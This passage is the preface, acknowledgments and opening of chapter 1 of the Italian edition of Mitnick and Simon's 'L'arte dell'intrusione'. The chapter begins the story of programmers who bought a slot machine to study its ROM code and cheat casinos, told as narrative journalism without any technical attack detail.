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Prefazione 


Agli hacker- i giovani e i meno giovani - piace gareggiare tra 
loro. Ovviamente, uno dei trofei più ambiti sarebbe il potersi van- 
tare di avere hackerato il sito della mia azienda di sicurezza infor- 
matica o il mio sistema personale. 

Un altro sarebbe stato il sapere inventare la storia di un hack 
rifilarla a me e al coautore Bill Simon in modo così convincen- 
te che noi l'avremmo seguita, presa per vera, e inserita in que- 
sto libro. 

Tutto ciò ha rappresentato una sfida affascinante, un gioco 
di astuzia che entrambi abbiamo giocato, volta per volta, mentre 
realizzavamo le interviste per questo libro. Per la maggior parte 
dei giornalisti e degli autori, verificare l'autenticità è una que- 
stione di routine: questa persona è veramente colei o colui che 
afferma di essere? È questa o era questa la persona che lavora 
per l’organizzazione per cui dice di lavorare? Questa persona oc- 
cupava veramente la posizione che asseriva di occupare? Questa 
persona ha una documentazione valida per comprovare la sua 
storia, e posso verificare che questi documenti sono validi? Esi- 
stono delle persone con una reputazione solida che conferme- 
ranno la storia o parti di essa? 

Con gli hacker, verificare la loro buona fede non è così sem- 
plice. Molte delle persone le cui storie compaiono in questo li- 
bro, verrebbero incriminate penalmente se si potesse risalire al- 
la loro identità. Per questo chiedere i veri nomi, o aspettarsi di 
ricevere una prova, è un proposito di dubbio successo. 

Queste persone si sono solo fatte avanti con le loro storie 
perché si fidano di me. Sanno che sono stato in carcere per i 
miei hacke vogliono fidarsi del fatto che non li tradirò rischiando 
di metterli in una posizione compromettente. Eppure, nono- 
stante i rischi, molti hanno offerto delle prove tangibili dei lo- 
ro hack. 


Anche così, è possibile — in realtà è probabile — che alcune 
persone abbiano infarcito le loro storie di particolari mirati a ren- 
derle più seducenti. O che le abbiano inventate di sana pianta, 
ma costruendole intorno a un numero di attacchi abbastanza ef- 
ficaci da dar loro una parvenza di verità. 

Proprio per questo rischio, siamo stati scrupolosi nel segui- 
re casi che garantivano un alto grado di affidabilità. Nel corso di 
tutte le interviste, ho passato al setaccio ogni singolo dettaglio 
tecnico, chiedendo spiegazioni approfondite per qualsiasi cosa 
non suonasse corretta, ritornandoci a volte in seguito per verifi- 
care se la storia era ancora la stessa, o se l’autore la raccontava 
in modo diverso. O per verificare se questa persona “non riusci- 
va a ricordare”, quando le venivano chieste spiegazioni su alcu- 
ni passaggi difficili che erano stati omessi dalla storia. O se que- 
sta persona non sembrava saperne abbastanza per realizzare la 
cosa che aveva rivendicato o non poteva spiegare come era an- 
data dal punto A al punto B. 

A eccezione dei punti in cui viene specificamente indicato, 
tutte le storie principali contenute in questo libro hanno supera- 
to il mio “test dell'olfatto”. Il mio coautore e io concordiamo sul- 
la credibilità di tutte le persone di cui abbiamo selezionato il rac- 
conto. Non di meno, i dettagli sono stati spesso modificati per 
proteggere l’hacker e la vittima. 

Poiché gli sviluppatori di software e i costruttori di hardwa- 
re riparano continuamente i punti vulnerabili dei sistemi di si- 
curezza, attraverso patch e nuove versioni dei prodotti, allo stes- 
so modo lavorano gli hacker descritti in questo libro. Ma la le- 
zione di queste storie, che siano accadute sei mesi o sei anni fa, 
è che gli hacker scoprono ogni giorno nuove vulnerabilità. Leg- 
gete questo libro non per conoscere questo o quel punto debole 
di un prodotto specifico, ma per cambiare i vostri atteggiamenti 
e suggerire nuove soluzioni. 

E leggete il libro, inoltre, per essere divertiti, spaventati e stu- 
piti dagli attacchi sempre sorprendenti di questi hacker perver- 
samente astuti. 

Alcuni sono scioccanti, altri rivelatori, altri vi faranno sorri- 
dere della vena spavalda e ispirata dell’hacker. Se siete profes- 
sionisti dell’information technology o della sicurezza informati- 
ca, ciascuna di queste storie contiene delle lezioni per rendere la 
vostra organizzazione più sicura. Se siete una persona non tec- 
nica cui piacciono i racconti gialli e il coraggio puro di chi osa e 
ama rischiare, nel libro troverete tutto questo. 

Durante queste “avventure” gli hacker hanno continuamen- 
te rischiato che una squadra di poliziotti, agenti del Fbi o dei ser- 
vizi segreti, bussassero alla loro porta pronti ad ammanettarli. E, 
in un certo numero di occasioni, è accaduto proprio questo. 


10 


Del resto, una possibilità del genere c'è sempre. Non c'è da 
stupirsi che la maggior parte di questi hacker non abbia mai vo- 
luto raccontare la propria storia prima d'ora. La maggior parte 
delle avventure che leggerete in questo libro vengono pubblicate 
per la prima volta in assoluto. 
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Ringraziamenti 


Questo libro è dedicato alla mia splendida famiglia; ai miei 
amici più cari e, soprattutto, alle persone che hanno reso questo 
libro possibile: gli hacker blackhat e whitehat! che ci hanno sot- 
toposto le loro storie per la nostra educazione e divertimento. 

L'arte dell'intrusione è stato anche più impegnativo del nostro 
libro precedente. Anziché investire le nostre energie creative com- 
binate nella stesura di storie e aneddoti che illustrassero i danni 
del social engineering? e ciò che le aziende possono fare per con- 
tenerli, Bill Simon e io ci siamo affidati questa volta alle intervi- 
ste a ex hacker, phreaker* e hacker divenuti poi professionisti dei 
sistemi di sicurezza. Volevamo scrivere un libro che fosse sia un 
thriller, sia una guida che aiutasse le aziende a tenere gli occhi 
aperti per proteggere le loro informazioni di valore e le loro ri- 
sorse informatiche. Crediamo fermamente che rivelando le me- 
todologie e le tecniche comunemente usate dagli hacker per en- 
trare nei sistemi informatici e nelle reti, possiamo spingere la so- 
cietà nel suo complesso a prendere in considerazione i rischi e le 
minacce da essi poste. 

. Ho avutola fortuna straordinaria di essere associato a un au- 
tore di successi editoriali come Bill Simon, e abbiamo lavorato 
diligentemente insieme a questo nuovo libro. Il talento di Bill co- 


! Gli hacker del “cappello nero” e del “cappello bianco” descrivono due atti- 
tudini diverse rispetto alla pratica dell’hacking: i primi mettono le loro capacità 
al servizio di azioni distruttive e/o dolose; i secondi mirano invece a scopi posi- 
tivi o, quantomeno, informativi. [N.d.7] 

2 Il libro precedente di Mitnick e Simon si chiama L'arte dell'inganno (Fel- 
trinelli, Milano 2003) e racconta le tecniche di social engineering per ottenere 
informazioni sensibili mentendo e manipolando gli addetti alla loro custodia. 
[N.d.T] 

3 I phreaker sono persone che si inseriscono nelle reti telefoniche per effet- 
tuare telefonate gratuite o per origliare le conversazioni altrui. [N.d.7.] 
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me scrittore è notevole, come magica è la sua capacità di pren- 
dere le informazioni fornite dalle nostre fonti e trascriverle in un 
modo e con uno stile tale da farle comprendere a una qualsiasi 
nonna. Ancora più importante è che Bill sia divenuto non solo 
un socio di lavoro nella scrittura, ma un amico leale, che è ri- 
masto con me durante tutto il processo di sviluppo. Anche se ab- 
biamo avuto alcuni momenti di frustrazione e divergenze di opi- 
nione durante la fase realizzativa, tutto è stato sempre risolto con 
mutua soddisfazione. Tra poco più di due anni, non appena de- 
cadranno alcune restrizioni governative, potrò finalmente scri- 
vere e pubblicare The Untold Story of Kevin Mitnick [La storia mai 
raccontata di Kevin Mitnick]. Spero che Bill e io continueremo 
a collaborare anche su questo progetto. 

Anche la splendida moglie di Bill, Arynne Simon, ha un po- 
sto speciale nel mio cuore. Apprezzo l'affetto, la gentilezza e la 
generosità che mi ha dimostrato in questi ultimi tre anni. La mia 
unica frustrazione è di non aver potuto godere della sua grande 
cucina. Ora che il libro è finalmente concluso, potrò convincer- 
la a preparare una cena di festeggiamento! 

Poiché sono stato così concentrato su L'arte dell’intrusione, 
non sono stato in grado di trascorrere molto tempo con la mia 
famiglia e gli amici più stretti. Sono diventato una specie di sta- 
canovista, come ai tempi in cui passavo innumerevoli ore davanti 
allo schermo esplorando gli antratti del cyberspazio. 

Voglio ringraziare la mia amata ragazza, Darci Wood, e sua 
figlia Briannah, appassionata di giochi, per il sostegno e la pa- 
zienza nel corso di questo progetto succhiatempo. Grazie, pic- 
cola, per tutto il tuo amore, la dedizione e il sostegno che tu e 
Briannah mi avete dato mentre lavoravo a questo e ad altri pro- 
getti impegnativi. 

Questo libro non sarebbe stato possibile senza l’amore e il 
supporto della mia famiglia. Mia madre, Shelley Jaffe, e mia non- 
na, Reba Vartanian, mi hanno dato un amore incondizionato nel 
corso di tutta la vita. Sono molto fortunato per essere stato cre- 
sciuto da una madre così amorevole e devota, che considero an- 
che la mia migliore amica. Mia nonna è stata come una seconda 
madre e mi ha dato tutto il nutrimento e l’amore che di solito so- 
lo una madre può donare. E stata estremamente utile nel gestire 
alcuni dei miei affari di lavoro, anche quando interferivano con 
i suoi impegni. In tutte le occasioni, ha dato precedenza assolu- 
ta alle mie cose, anche quando non le conveniva farlo. Grazie 
nonna, per avermi aiutato a terminare il lavoro ogni volta che 
avevo bisogno di te. Queste persone compassionevoli e caritate- 
voli mi hanno insegnato i principi del prendersi cura degli altri 
e del dare una mano a coloro che sono meno fortunati. E così, 
imitando il percorso del dare e del prendersi cura, io stesso, in 


14 


un certo senso, seguo il percorso delle loro vite. Spero che mi per- 
doneranno per averle tenute in “sala d'attesa” durante la stesura 
di questo libro, rimandando le occasioni per vederle con la scu- 
sa del lavoro e delle scadenze da rispettare. Questo libro non sa- 
rebbe stato possibile senza il loro affetto e il loro sostegno conti- 
nuo, che manterrò per sempre stretti al mio cuore. 

Come vorrei che mio padre, Alan Mitnick, e mio fratello, Adam 
Mitnick, fossero vissuti abbastanza per stappare insieme una bot- 
tiglia di champagne nel giorno in cui il nostro secondo libro ar- 
riva in libreria. Come commerciante e proprietario di un’azien- 
da, mio padre mi ha insegnato molte cose importanti che non di- 
menticherò mai. 

Il vecchio fidanzato di mia madre, Steven Knittle, è stato per 
me una figura paterna negli ultimi dodici anni. Mi ha molto gio- 
vato sapere che eri sempre lì a prenderti cura di mamma quan- 
do io non potevo. La tua scomparsa ha avuto un profondo im- 
patto sulla nostra famiglia e ci manca il tuo senso dell'umorismo, 
le tue risate e l'amore che ci hai donato. Rip. 

Mia zia Chickie Leventhal occuperà sempre un posto speciale 
nel mio cuore. Negli ultimi due anni, i nostri legami familiari si so- 
no rafforzati e la nostra comunicazione è stata fantastica. Ogni vol- 
ta che ho avuto bisogno di un consiglio o di un posto dove stare, 
lei era sempre lì a offrirmi il suo affetto e il suo sostegno. A causa 
della dedizione totale che ho messo nella stesura di questo libro, 
ho sacrificato diverse opportunità di vedermi con lei, con mia cu- 
gina, Mitch Leventhal, e con il suo ragazzo, il dottor Robert 
Berkowitz, in occasione dei nostri incontri di famiglia. 

Il mio amico Jack Bello era una persona amabile e caritate- 
vole che ha preso la parola pubblicamente contro gli incredibili 
maltrattamenti che ho subito a opera di giornalisti e pubblici mi- 
nisteri. È stato una voce fondamentale del movimento Free Ke- 
vin e uno scrittore che aveva un talento straordinario nel redige- 
re articoli efficaci per esporre le informazioni che il governo non 
voleva venissero fuori. Jack era sempre lì a parlare senza timore 
in mia difesa e a lavorare con me nel preparare discorsi e artico- 
li e, a un certo punto, è riuscito a rappresentarmi come un affai- 
re mediatico. Mentre portavo a termine il manoscritto L'arte del- 
l'inganno (Feltrinelli, Milano 2003), la scomparsa di Jack mi ha 
lasciato un enorme senso di perdita e tristezza. Anche se sono 
passati due anni, Jack è sempre nei miei pensieri. 

Una delle mie amiche più care, Caroline Bergeron, ha soste- 
nuto molto il mio sforzo di portare a compimento il progetto di 
questo libro. E una persona adorabile e brillante che presto di- 
venterà avvocato. Dopo averla incontrata a Victoria, in occasio- 
ne di uno dei miei impegni da oratore, ci siamo intesi subito. Ha 
messo a disposizione le sue competenze come correttrice di boz- 
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ze, editor, e ha revisionato il seminario di due giorni sul social 
engineering che Alex Kasper e io avevamo sviluppato. Grazie, Ca- 
roline, per essere stata lì con me. 

Il mio collega Alex Kasper non è solo il mio migliore amico 
ma anche il mio socio; al momento stiamo sviluppando semina- 
ri di uno o due giorni su come le aziende possono riconoscere il 
social engineering e difendersi da esso. Insieme abbiamo con- 
dotto un popolare talk show radiofonico conosciuto come “Il la- 
to oscuro di Internet” su radio Kfi di Los Angeles. Sei stato un 
grande amico e una persona di fiducia. Grazie per la tua assi- 
stenza e i tuoi consigli inestimabili. La tua influenza è sempre 
stata positiva e di grande aiuto, con una gentilezza e una gene- 
rosità che si sono spesso spinte oltre la norma. 

Paul Dryman è stato un amico di famiglia per molti, molti an- 
ni. Paul è stato il migliore amico del mio vecchio padre. Dopo che 
mio padre è scomparso, Paul è stata una figura paterna, che ha 
sempre voluto aiutarmi e parlare di qualsiasi cosa mi passasse 
per la mente. Grazie Paul, per amicizia che hai donato a mio pa- 
dre e a me per così tanti anni. 

Amy Gray ha gestito la mia carriera di oratore negli ultimi 
quattro anni. Non solo ammiro e adoro la sua personalità, ma 
stimo il modo in cui tratta le altre persone con rispetto e corte- 
sia. Il tuo sostegno e la tua dedizione al professionismo hanno 
contribuito al mio successo come oratore pubblico e come for- 
matore. Grazie mille per la tua amicizia duratura e per la tua ri- 
cerca costante dell'eccellenza. 

L'avvocato Gregory Vinson ha fatto parte del mio team di av- 
vocati difensori nel corso della battaglia pluriennale contro il go- 
verno. Sono certo che capisce la comprensione e la pazienza di 
Bill per il mio perfezionismo; ha avuto la stessa esperienza lavo- 
rando con me sui brief legali che ha scritto per conto mio. Gre- 
gory ora cura i miei affari, e lavora diligentemente sui nuovi con- 
tratti negoziando gli accordi commerciali. Grazie per il tuo me- 
raviglioso sostegno e per il lavoro puntuale, soprattutto quando 
richiesto con scarso preavviso. 

Eric Corley (alias Emmanuel Goldstein) è stato un sosteni- 
tore attivo e un amico fraterno per oltre un decennio. Mi ha sem- 
pre protetto difendendomi pubblicamente quando venivo demo- 
nizzato dalla Miramax Films e da alcuni giornalisti. Eric è stato 
estremamente efficace nel tenere viva l'attenzione mentre il go- 
verno mi incriminava. La tua gentilezza, generosità e amicizia si- 
gnificano per me più di quanto le parole possano esprimere. Ti 
ringrazio perché sei un amico leale e fidato. 

Steve Wozniak e Sharon Akers hanno impegnato molto del 
loro tempo per assistermi e sono sempre lì a coadiuvarmi. Ap- 
prezzo molto lo spostamento frequente dei vostri appuntamenti 
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per potermi aiutare e mi spinge a chiamarvi affettuosamente ami- 
ci. Spero che ora che il libro è completo avremo più tempo per 
stare insieme e parlare dei nostri congegni. Steve, non dimenti- 
cherò mai la volta in cui tu, Jeff Samuels e io guidammo nella 
notte la tua Hummer per andare al Defcon di Las Vegas, alter- 
nandoci costantemente alla guida in modo che potessimo tutti 
controllare la posta e chattare con gli amici tramite il collega- 
mento wireless Gprs. 

E mentre scrivo questi ringraziamenti, realizzo di dover rin- 
graziare ed esprimere il mio apprezzamento per così tante ver- 
sone che mi hanno offerto il loro affetto, amicizia e sostegno. Non 
posso neanche iniziare a ricordare i nomi di tutte le persone che 
ho incontrato negli anni recenti, ma basti dire che avrei bisogno . 
di una memoria Usb molto capiente per contenerli tutti. Ci sono 
state così tante persone da tutto il mondo che mi hanno scritto 
parole di incoraggiamento, elogio e sostegno. Queste parole han- 
no significato moltissimo per me, soprattutto nei periodi in cui 
ne avevo più bisogno. 

Sono particolarmente grato a tutti i sostenitori che mi sono 
stati a fianco e hanno speso tempo ed energie preziose per infor- 
mare chiunque fosse disponibile ad ascoltare, facendo sentire la 
loro preoccupazione e le proprie obiezioni al trattamento ingiu- 
sto che mi veniva riservato e all’iperbole creata da coloro che han- 
no cercato di trarre profitto dal “mito di Kevin Mitnick”. 

Voglio ringraziare le persone che rappresentano la mia car- 
riera professionale e si impegnano in modo straordinario. David 
Fugate, della Watergate Productions, è il mio agente, che mi ha 
difeso in molte occasioni, prima e dopo che il contratto del libro 
era stato firmato. 

Apprezzo molto l'opportunità che Wiley & Sons mi ha dato 
di firmare un altro libro e la loro fiducia nella nostra capacità di 
scrivere un bestseller. Voglio ringraziare le seguenti persone di 
Wiley che hanno reso questo sogno possibile: Ellen Gerstein, Bob 
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tare a termine il lavoro. 

Ho avuto troppe esperienze con gli avvocati ma dedico volen- 
tieri uno spazio per esprimere i miei ringraziamenti agli avvoca- 
ti che, negli anni delle mie interazioni negative con il sistema di 
giustizia penale, fecero un passo avanti e si offrirono di aiutarmi 
quando ne avevo un bisogno disperato. Da quelli che hanno espres- 
so delle belle parole a coloro che sono stati profondamente coin- 
volti nel mio caso, ho incontrato molte persone che non rientra- 
no nello stereotipo dell'avvocato egocentrico. Ho imparato a ri- 
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loro vive nel mio cuore pieno di gratitudine: Greg Aclin, Fran 
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Figueroa, Jim French, Carolyn Hagin, Rob Hale, David Mahler, 
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Wilson, Joey Wilson, Dave e Dianna Wykotka, e tutti i miei ami- 
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Di Bill Simon 


Durante la stesura del nostro primo libro, L'arte dell'inganno, 
Kevin Mitnick e io abbiamo costruito un'amicizia. Mentre lo scri- 
vevamo, abbiamo scoperto continuamente nuovi modi per lavo- 
rare insieme, approfondendo la nostra amicizia. Per questo le 
mie prime parole di stima vanno a Kevin, per essere stato uno 
straordinario “compagno di viaggio” mentre condividevamo que- 
sta seconda avventura. 

David Fugate, il mio agente della Waterside Productions, Puo- 
mo responsabile del primo incontro tra me e Kevin, è ricorso al- 
la sua solita riserva di pazienza e saggezza per trovare i modi per 
risolvere le poche situazioni di tensione che sono affiorate. Quan- 
do la situazione si fa tesa, ogni scrittore dovrebbe avere la bene- 
dizione di un agente saggio e buono quanto un amico. Lo stesso 
vale per il mio amico di lungo corso, Bill Gladstone, fondatore 
della Waterside Productions e mio agente principale. Bill rima- 
ne un fattore chiave nel successo della mia carriera di scrittore e 
ha tutta la mia gratitudine di sempre. 

Mia moglie Arynne continua a ispirarmi ogni nuovo giorno 
con il suo affetto e la sua dedizione all’eccellenza; la stimo più di 
quanto non possa dire a parole. Ha migliorato la mia capacità 
tecnica di scrittore grazie alla sua intelligenza e alla volontà di 
essere diretta e dicendomi senza mezzi termini quando la mia 
scrittura mancava il bersaglio. In qualche modo riesce a passare 
attraverso i fumi della rabbia, cioè della mia consueta risposta 
iniziale alle sue osservazioni, ma alla fine accetto la saggezza dei 
suoi suggerimenti e mi metto a riscrivere. 

Mark Wilson mi ha dato una mano, facendo la differenza. 
Emilie Herman è stata un editor imbattibile. E non posso di- 
menticare il lavoro di Kevin Shafer, che ha preso il posto di Emi- 
lie quando se ne è andata. 

Anche con un sedicesimo libro si accumula un debito nei con- 
fronti delle persone che in questo percorso mi sono state molto 
d'aiuto; tra le tante, voglio citare Kimberly Valentini e Maureen 
Maloney di Waterside, e Josephine Rodriguez. Marianne Stuber 
ha fatto velocemente il suo solito lavoro di trascrizione (non fa- 
cile con tutti questi termini tecnici strani e il gergo degli hacker) 
e Jessica Dudgeon ha tenuto saldamente in mano l’ufficio. Darci 
Wood è stata un'eroina se si considera il tempo che il suo Kevin 
ha dedicato alla stesura di questo libro. 

Un ringraziamento speciale va a mia figlia Victoria e a mio 
figlio Sheldon per la loro comprensione, e ai miei nipoti, i gemelli 
Vincent ed Elena, in cui credo e che potrò vedere di più, una vol- 
ta consegnato questo manoscritto. 

Kevin e io siamo profondamente in debito verso molti che ci 
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hanno offerto le loro storie, e soprattutto nei confronti di quelli 
che abbiamo selezionato. Si sono fatti avanti nonostante corres- 
sero rischi significativi. Se i loro nomi fossero stati rivelati, in 
molti casi avrebbero rischiato di essere portati via dagli “uomini 
in blu”. Anche quelli le cui storie non sono state utilizzate hanno 
mostrato coraggio per la loro volontà di condividerle, e merita- 
no ammirazione per questo. Noi, in effetti, li ammiriamo molto. 
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1. 
Hackerare i casinò per un milione di dollari 


Ogni volta che [un ingegnere del software] dice 
“nessuno si prenderà la briga di fare quella co- 
sa”, c'è un ragazzino in Finlandia che si pren- 
derà la briga di farla. 

Alex Mayfield 


Ecco che arriva il momento magico del giocatore, quando del- 
le semplici vibrazioni si dilatano fino a diventare fantasie a tre 
dimensioni, il momento in cui l'avidità soffoca letica e il sistema 
dei casinò è solo un’altra vetta da conquistare. Nel momento in 
cui si materializza l’idea di un marchingegno a prova di bomba 
per battere i tavoli o le macchine, ecco che se ne va il respiro. 

Alex Mayfield e tre dei suoi amici non hanno solo sognato a 
occhi aperti. Come molti altri hack, anche questo cominciò co- 
me un semplice esercizio intellettuale, tanto per vedere se fosse 
stato possibile. Alla fine, i quattro hanno battuto il sistema, truf- 
fando i casinò per “circa un milione di dollari”, dice Alex. 

All’inizio degli anni novanta, i quattro lavoravano come con- 
sulenti dell'industria high tech e conducevano una vita rilassata 
e informale. “Sai com'è, lavoravi, facevi un po’ di soldi, e poi non 
lavoravi finché non eri di nuovo al verde.” 

Las Vegas era lontana, un set cinematografico e televisivo. Co- 
sì quando un'azienda tecnologica offrì loro un lavoro per svilup- 
pare dei software, per poi presentarli a una fiera commerciale e a 
una convention dell’alta tecnologia, colsero al volo l'occasione. Sa- 
rebbe stata la prima volta a Las Vegas per tutti e quattro, un’oc- 
casione per vedere le luci abbaglianti, con tutte le spese pagate: 
chi vi avrebbe rinunciato? Le suite separate in un albergo di pri- 
ma categoria volevano dire che la moglie di Alex e la ragazza di 
Mike potevano divertirsi con loro. Le due coppie, insieme a Larry 
e Marco, partirono per spassarsela nella città del peccato. 

Alex racconta che non ne sapevano molto di gioco d'azzardo 
e non sapevano cosa li attendeva. “Scendi dall'aereo e vedi le vec- 
chie signore che giocano alle slot. Sembra divertente e ironico, e 
ti lasci prendere.” 

Dopo che i quattro ebbero finito la fiera commerciale, insie- 
me alle due signore si spostarono nel casinò dell’hotel per gioca- 
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re alle slot machine e godersi le birre gratuite, quando la moglie 
di Alex lanciò una sfida: 


Queste macchine non funzionano come dei computer? Voi ragazzi 
siete degli informatici. Non potete fare qualcosa per farci vincere 
di più? 


I quattro si spostarono nella suite di Mike e iniziarono a por- 
si domande e formulare teorie su come potessero funzionare quel- 
le macchine. i 


La ricerca 


Quella fu la miccia. “La faccenda ci incuriosiva e tornati a ca- 
sa iniziammo ad approfondirla,” dice Alex, richiamando le me- 
morie vivide di quella fase creativa. Ci volle solo poco tempo, per- 
ché la ricerca confermasse i primi sospetti. “Sì, fondamental- 
mente si trattava di software per computer. Così una volta inte- 
ressatici alla cosa ci siamo chiesti: esiste un modo per craccare 
quelle macchine?” 

C'erano persone che avevano battuto le slot machine “sosti- 
tuendo il firmware”,! cioè trovando il chip contenuto nella mac- 
china e sostituendone la programmazione con una versione che 
avrebbe fornito incassi molto più attraenti di quelli previsti dal 
casinò. Altri gruppi l'avevano fatto, ma ciò sembrava richiedere 
il coinvolgimento complice di un dipendente del casinò, e non 
con uno qualsiasi ma con uno dei tecnici delle slot. Per Alex e 
compagni, “sostituire le memorie Rom sarebbe stato come col- 
pire una vecchietta in testa e rubarle il borsellino”. Farlo sareb- 
be stata una sfida allettante per le loro capacità di programma- 
tori e per il loro intelletto. E inoltre non avevano un particolare 
talento per il social engineering; erano informatici cui mancava 
una qualsiasi conoscenza di come ci si ingrazia il dipendente di 
un casinò e gli si propone di partecipare a un giochetto per pren- 
dersi dei soldi che non ti appartengono. 

Ma come avrebbero iniziato ad affrontare il problema? Alex 
spiega: 


1I] firmware è un piccolissimo software che risiede in un componente hardwa- 
re. Generalmente trova posto all’interno di una memoria Rom o EEPRom per- 
ché, data la sua importanza, deve essere molto difficile cancellarlo. Lo scopo del 
firmware è permettere la comunicazione tra il software (generalmente il sistema 
operativo) di un computer e il componente hardware in cui è installato [N.d.T.]. 
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Ci chiedevamo se saremmo stati capaci di prevedere qualcosa nella 
sequenza delle carte. O forse avremmo potuto trovare una backdoor 
[codice contenuto nel software che permette un accesso successivo 
non autorizzato al programma] che qualche programmatore aveva 
forse inserito a proprio beneficio. Tutti i programmi sono scritti da 
programmatori e i programmatori sono creature dispettose. Pen- 
sammo che in qualche modo avremmo potuto imbatterci in una 
backdoor, come il premere i pulsanti secondo una certa sequenza 
per cambiare il risultato, o un semplice difetto di programmazione 
di cui avremmo potuto approffittare. 


Alex aveva letto il libro The Eudaemonic Pie di Thomas Bass,? 
la storia di come un gruppo di informatici e di fisici aveva vinto 
‘alla roulette negli anni ottanta a Las Vegas usando un computer 
“indossabile” di propria invenzione delle dimensioni di un mez- 
zo pacchetto di sigarette che prevedeva i risultati del gioco della 
roulette. Un componente del gruppo al tavolo da gioco premeva 
dei pulsanti per inserire la velocità della ruota della roulette e il 
modo in cui la pallina roteava. Il computer trasmetteva quindi 
dei toni via radio all’auricolare indossato da un altro componen- 
te del gruppo, il quale avrebbe interpretato il segnale e puntato 
in modo appropriato. Sarebbero dovuti uscire con una monta- 
gna di soldi, ma non andò così. Secondo Alex “il loro piano ave- 
va chiaramente un grande potenziale, ma era afflitto da una tec- 
nologia rozza e poco affidabile, Inoltre c'erano molti partecipanti, 
il che faceva sì che i rapporti interpersonali fossero un problema. 
Eravamo determinati a non ripetere i loro errori”. 

Alex pensò che sarebbe stato facile vincere a un gioco basa- 
to su un computer “perché il computer è completamente deter- 
minista”. Il risultato si basa su quanto è accaduto prima o, per 
parafrasare l’espressione di un vecchio ingegnere del software: 
buoni dati in entrata, buoni dati in uscita. (L'espressione origi- 
nale affronta la questione da un punto di vista negativo: “Spaz- 
zatura in entrata, spazzatura in uscita”.) 

Era proprio quanto faceva per lui. Da giovane, Alex era stato 
un musicista che faceva parte di un gruppo di culto e aveva so- 
gnato di diventare una rockstar. Visto che la cosa non funzionava 
si era buttato nello studio della matematica. Aveva talento per la 
matematica e anche se non si era mai impegnato troppo a scuola 
(e aveva lasciato il college), aveva approfondito la materia quanto 
basta per raggiungere un livello di competenza piuttosto solido. 

Avendo deciso che era necessario fare delle ricerche, andò a 
Washington per trascorrere del tempo nella sala letture dell’uffi- 
cio brevetti. “Pensai che qualcuno poteva essere stato tanto stu- 


? Parzialmente raccontato anche in Th. Bass, Sbancare Wall Street, Feltrinelli, 
Milano 2002. [N.d.T] 
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pido da mettere tutto il codice nel brevetto” di una macchina di 
videopoker. E aveva ragione. “All'epoca, mettere una gran quan- 
tità di codice oggetto? in un brevetto era un modo per il deposi- 
tario del brevetto di proteggere la sua invenzione, ma in una for- 
ma che non è molto comprensibile per l'utente medio. Registrai 
dei microfilm con il codice oggetto e quindi scannerizzai le pa- 
gine con gli esadecimali per le sezioni più interessanti, che do- 
vevano essere disassemblate [in una forma usabile].” 

L'analisi del codice rivelò alcuni segreti che il gruppo trovò 
intriganti, ma giunsero alla conclusione che il solo modo per fa- 
re dei progressi veri sarebbe stato mettere le mani sul tipo spe- 
cifico di macchina che volevano hackerare, in modo tale che avreb- 
bero potuto guardare il codice per conto loro. 

Come squadra, i quattro erano ben assortiti. Mike era un pro- 
grammatore più che competente, più bravo degli altri tre sulla 
progettazione hardware. Marco, anch'egli programmatore di al- 
to livello, era un immigrato dell'Europa dell'Est che sembrava un 
adolescente. Ma era uno sbruffone, uno che affrontava tutto con 
un atteggiamento da so-tutto-io, quanto-sono-figo. Alex eccelle- 
va nella programmazione ed era quello che aveva le conoscenze 
di crittografia di cui avrebbero avuto bisogno. Larry non era un 
vero programmatore e a causa di un incidente avuto con la mo- 
to non poteva viaggiare molto, ma era un grande organizzatore; 
faceva marciare il progetto in modo che ognuno potesse con- 
centrarsi a ogni passaggio sul da farsi. 

Dopo la ricerca iniziale, Alex “quasi si dimenticò” del pro- 
getto. Marco, al contrario, era assolutamente preso dall'idea. Con- 
tinuò a insistere: “Non è una cosa difficile, ci sono tredici stati in 
cui si possono comprare legalmente le macchine”. Alla fine riu- 
© scì a convincere gli altri a provarci. “Ci provammo, e che diami- 
ne.” Ognuno mise una quantità sufficiente a coprire i costi del 
viaggio e di una slot. Tornarono a Las Vegas, questa volta a spe- 
se loro e con un altro obiettivo nella testa. 

Racconta Alex: “Per comprare una slot machine, in pratica 
dovevamo entrare e mostrare un documento d'identità di uno sta- 
to in cui è legale possedere queste macchine. Con una patente di 
uno di questi stati, non fecero molte domande”. Uno dei quattro 
conosceva un residente del Nevada. “Era lo zio della ragazza di 
qualcuno, o qualcosa del genere, e viveva a Las Vegas.” 

Per parlargli scelsero Mike perché “ha un modo di fare da 


3 In informatica, il codice oggetto (o file oggetto) è la traduzione del sorgente 
in linguaggio macchina (binario), comprensibile solo all’elaboratore. Il codice og- 
getto è generato automaticamente da un apposito programma detto compilato- 
re, e viene poi passato a un linker che genera un codice eseguibile. Questi due 
passi sono a volte fusi in uno solo, detto generalmente di compilazione. [N.d.T] 
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venditore, è un tipo di persona molto presentabile. Il punto di 
partenza è che lo stai utilizzando per una truffa di gioco. È come 
con le pistole”, spiega Alex. Molte macchine finiscono “sul mer- 
cato grigio” — vendute al di fuori dei canali ufficiali — in posti co- 
me i club sociali. E tuttavia, Alex trovò sorprendente che “potes- 
simo comprare esattamente le stesse unità di produzione che si 
usano nei casinò”. 

Mike diede all'uomo millecinquecento dollari per la slot, una 
marca giapponese. “Quindi noi due caricammo quest'affare in 
macchina. La trasportammo a casa come se avessimo avuto un 
bambino sul sedile posteriore.” 


Lo sviluppo dell’hack 


Mike, Alex e Marco trascinarono la macchina al secondo pia- 
no di una casa dove era stata messa a loro disposizione una stan- 
za da letto. Il brivido di quell’esperienza sarebbe stato ricordato 
a lungo da Alex come uno dei momenti più eccitanti di tutta la 
sua vita: 


La apriamo, tiriamo fuori la memoria Rom, cerchiamo di capire di 
che tipo di processore si tratta. Avevo deciso di prendere questa mac- 
china giapponese che sembrava una copia taroccata di uno dei gran- 
di marchi. Avevo pensato che gli ingegneri avevano lavorato forse 
‘sotto pressione, e che avrebbero potuto essere un po’ pigri o ap- 
prossimativi. 
Scoprimmo che avevo ragione. Avevano usato un [chip] 6809, simi- 
le a un 6502 che avevamo visto su un Apple II o su un Atari. Era un 
chip a 8-bit con una memoria da 64k di spazio. Ero un program- 
matore di linguaggio assembly, per cui queste erano cose note. 


La macchina che Alex aveva scelto era stata in circolazione 
per circa dieci anni. Ogni volta che un casinò vuole acquistare 
una macchina di nuova progettazione, la Commissione di Las 
Vegas sui giochi deve studiare il programma e assicurarsi che 
sia stato realizzato in modo che i pagamenti siano equi per i gio- 
catori. Ottenere l'approvazione di una nuova macchina può es- 
sere un processo lungo, così i casinò tendono a mantenere le vec- 
chie macchine più a lungo di quanto non ci si aspetti. Secondo 
il gruppo era probabile che una macchina vecchia avesse una 
